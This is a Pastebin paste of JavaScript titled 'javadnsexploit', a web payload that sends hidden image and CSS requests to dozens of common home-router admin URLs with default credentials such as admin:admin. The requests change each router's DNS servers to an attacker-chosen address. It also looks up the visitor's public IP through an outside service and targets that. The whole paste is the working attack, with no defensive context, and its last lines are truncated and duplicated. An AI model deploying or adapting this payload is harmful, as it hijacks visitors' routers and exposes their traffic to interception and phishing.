hackernix

javadnsexploit

Mar 20th, 2019
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <script type="text/javascript">
  2. var dnsprimario = "192.169.90.246";
  3.     var dnssecundario = "8.8.8.8";
  4.     document.write('<img src="http://admin:admin@10.1.1.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  5.     document.write('<img src="http://192.168.0.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  6.     document.write('<img src="http://10.1.1.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  7.     document.write('<img src="http://192.168.1.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  8.     document.write('<img src="http://root:root@83.142.155.209/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  9.     document.write('<img src="http://admin:admin@83.142.155.209/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  10.     document.write('<img src="http://184.170.140.162/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  11.     document.write('<img src="http://user:user@192.168.1.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  12.     document.write('<img src="http://admin:admin@10.1.1.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  13.     document.write('<img src="http://admin:admin@192.168.1.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  14.     document.write('<img src="http://10.0.0.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  15.     document.write('<img src="http://admin:admin@10.0.0.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  16.     document.write('<img src="http://admin:gvt12345@83.142.155.209/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  17.     document.write('<img src="http://admin:gvt12345@192.168.1.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');
  18.     document.write('<img src="http://admin:gvt12345@192.168.25.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1" height=1 width=1 >');  
  19.     document.write('<img src="http://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynam…&manual=2&dnsserver='+dnsprimario+'&dnsserver2='+dnssecundario+'&Save=Save >');  
  20.     document.write('<img src="http://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype…+dnsprimario+'&dnsserver2='+dnssecundario+'&hostName=&flagMode=2&Save=Save >');  
  21.    document.write('<img src="http://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?mtu=1500&manual=2&dnsserver='+dnsprimario+'&dnsserver2='+dnssecundario+'&Save=Save>');  
  22.    document.write('<img src="http://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?mtu=1500&manual=2&dnsserver='+dnsprimario+'&dnsserver2='+dnssecundario+'&Save=Save >');  
  23.     document.write('<img src="http://admin:admin@192.168.1.1/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=…&mtu=1500&dnsserver='+dnsprimario+'&dnsserver2='+dnssecundario+'&Save=Save >');  
  24.     document.write('<img src="http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName…r2='+dnssecundario+'&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced >');  
  25.     document.write('<img src="http://192.168.2.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName…r2='+dnssecundario+'&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced >');  
  26.     document.write('<img src="http://admin:admin@http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpM…rimario+'&dnsserver2='+dnssecundario+'&downBandwidth=0&upBandwidth=0&Save= &Advanced=Advanced >');  
  27.    document.write('<img src="http://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype…rver='+dnsprimario+'&dnsserver2='+dnssecundario+'&hostName=TLINK&Save=Save >');  
  28.    document.write('<img src="http://admin:admin@192.168.1.254/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wanty…rver='+dnsprimario+'&dnsserver2='+dnssecundario+'&hostName=TLINK&Save=Save >');  
  29.     document.write('<img src="http://admin:admin@192.168.1.1/start_apply.htm?wan_dns1_x='+dnsprimario+'&wan_dns2_x='+dnssecundario+' >');  
  30.     document.write('<img src="http:admin:admin@192.168.1.2/start_apply.htm?wan_dns1='+dnsprimario+'&wan_dns2='+dnssecundario+' >');  
  31.     document.write('<img src="http:admin:admin@192.168.2.2/start_apply.htm?wan_dns1='+dnsprimario+'&wan_dns2='+dnssecundario+' >');  
  32.     document.write('<img src="http://admin:password@192.168.1.1/start_apply.htm?dnsserver='+dnsprimario+'&dnsserver2='+dnssecundario+' >');
  33.     document.write('<style type="text/css">@import url(http://admin:admin@192.168.1.1/prim.htm?_scb=0&_ccb=0&N00010003=0x00&_cce=0…0&N001E0020=&N001E0090=0&N001E0017=&_end_0500=&_cce=0x80010009&_sce=%25Ssc);</style>');
  34.     document.write('<style type="text/css">@import url(http://admin:admin@192.168.0.1/prim.htm?_scb=0&_ccb=0&N00010003=0x00&_cce=0…0&N001E0020=&N001E0090=0&N001E0017=&_end_0500=&_cce=0x80010009&_sce=%25Ssc);</style>');
  35.     document.write('<style type="text/css">@import url(http://admin@192.168.1.1/prim.htm?_scb=0&_ccb=0&N00010003=0x00&_cce=0x80010…0&N001E0020=&N001E0090=0&N001E0017=&_end_0500=&_cce=0x80010009&_sce=%25Ssc);</style>');
  36.     document.write('<style type="text/css">@import url(http://admin@192.168.0.1/prim.htm?_scb=0&_ccb=0&N00010003=0x00&_cce=0x80010…0&N001E0020=&N001E0090=0&N001E0017=&_end_0500=&_cce=0x80010009&_sce=%25Ssc);</style>');
  37.     document.write('<style type="text/css">@import url(http://admin:admin@192.168.0.1/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype…rver='+dnsprimario+'&dnsserver2='+dnssecundario+'&hostName=TLINK&Save=Save);</style>');
  38.     document.write('<style type="text/css">@import url(http://admin:admin@192.168.1.1/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype…rver='+dnsprimario+'&dnsserver2='+dnssecundario+'&hostName=TLINK&Save=Save);</style>');
  39.     function CapturarIP() {  
  40.     if (window.XMLHttpRequest) xmlhttp = new XMLHttpRequest();  
  41.     else xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");  
  42.  
  43.     xmlhttp.open("GET","http://api.hostip.info/get_html.php",false);  
  44.     xmlhttp.send();  
  45.  
  46.     hostipInfo = xmlhttp.responseText.split("\n");  
  47.  
  48.     for (i=0; hostipInfo.length >= i; i++) {  
  49.         ipAddress = hostipInfo[i].split(":");  
  50.         if ( ipAddress[0] == "IP" ) return ipAddress[1];  
  51.     }  
  52.  
  53.     return false;  
  54.     }
  55.  
  56.  
  57. var ip = CapturarIP();
  58.    document.write('<style type="text/css">@import url(http://'+ip+'/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRefresh=1);</style>');
  59. </script>
  60. <script language=JavaScript>
  61.     var dnsprimario = "192.169.90.246";
  62.     var dnssecundario = "8.8.8.8";
  63.     document.write('<img src="http://admin:admin@10.1.1.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRef
  64.  
  65. //jsunpack.url var newurl = <script language=JavaScript>
  66.     var dnsprimario = "192.169.90.246";
  67.     var dnssecundario = "8.8.8.8";
  68.     document.write('<img src="http://admin:admin@10.1.1.1/dnscfg.cgi?dnsPrimary='+dnsprimario+'&dnsSecondary='+dnssecundario+'&dnsDynamic=0&dnsRef
  69.  
  70. </script>
Add Comment
Please, Sign In to add comment